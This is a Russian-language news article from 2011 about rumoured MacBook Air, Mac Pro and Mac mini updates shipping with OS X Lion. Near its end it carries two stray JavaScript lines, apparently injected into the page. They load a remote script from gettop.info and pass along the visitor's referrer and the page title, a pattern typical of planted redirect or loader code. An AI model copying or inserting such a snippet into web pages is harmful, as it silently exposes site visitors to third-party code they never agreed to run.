Новые Mac Pro и MacBook Air с OS X Lion на этой неделе

12.07.2011, Новости, Кирилл Месяц

Все мы ожидаем, что новые MacBook Air появятся на этой неделе, но теперь оказывается, что ультратонкие ноутбуки не единственные новые «Маки» на этой неделе. По словам некого Mr. X, появилась партия обновленных Mac Pro, намекая на релиз новой линейки десктопов Mac в ближайшие дни. Вот новые модели MacBook Air:

Как видите, специальные внутренние обозначения Apple показывают нам, что компания собирается выпустить четыре новые модели MacBook Air: по две 11 и 13 дюймовых модели; оба размера экрана будут как в обычной, так и в обновляемой конфигурации. Также будут доступны опции «под заказ». Ожидается некоторая оперативная память и обновленный процессор. По информации источников, которые уже успели «поюзать» новый MacBook Air, каких-либо заметных изменений внешнего вида ждать не следует. Скоростные процессоры Sandy Bridge и порт Thunderbolt — основные нововведения модели.

Удивительно, но похоже что новые Mac Pro также приходят уже на этой неделе. Новая линейка десктопов, если верить слухам, появится в последнюю неделю июля или первую неделю августа, но похоже Apple выпустит компьютеры ранее. Новые Mac Pro имеют переработанный корпус, более узкий и закрепленный в стойки. Также возможно появление более быстрых 16-ядерных моделей, очевидно с портом Thunderbolt. Как и ожидалось, дебютируют и новые Mac Pro Server. Вот новые модели Mac Pro:

Как сообщалось ранее, эти новые «Маки» будут первыми компьютерами Apple с предустановленной  Mac OS X Lion. Как ожидается, релиз  OS X Lion через магазин Mac App состоится в этот четверг, 14 июля. Также ходят слухи, что новые MacBook Air появятся также в четверг, поэтому возможно, что компания Apple запустит все эти замечательные продукты в один день. Очень скоро должен пробить час и новых Mac mini (возможно даже на этой неделе) с портом Thunderbolt и более быстрыми CPU.

One more thing?

Среди обозначений — 2x2GB обновляемой оперативной памяти, которая, возможна, предназначена для текущих MacBook или iMac, но не исключено, что и для новых Mini или даже Air.

document.currentScript.parentNode.insertBefore(s, document.currentScript);

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;

Читайте также:

  1. Розничные магазины Apple готовятся к запуску OS X Lion и новых MacBook Air
  2. Новые iMac и MacBook Pro «делают» Mac Pro в Final Cut Pro X тестах
  3. У BestBuy.com заканчиваются запасы MacBook Air — обновленный «воздух» на подходе
  4. Новый MacBook Air с более быстрым и энергосберегающим SSD?
  5. Выход OS X Lion намечен на 14 июля

Оставить комментарий

Обязательно.

Обязательно. Не публикуется.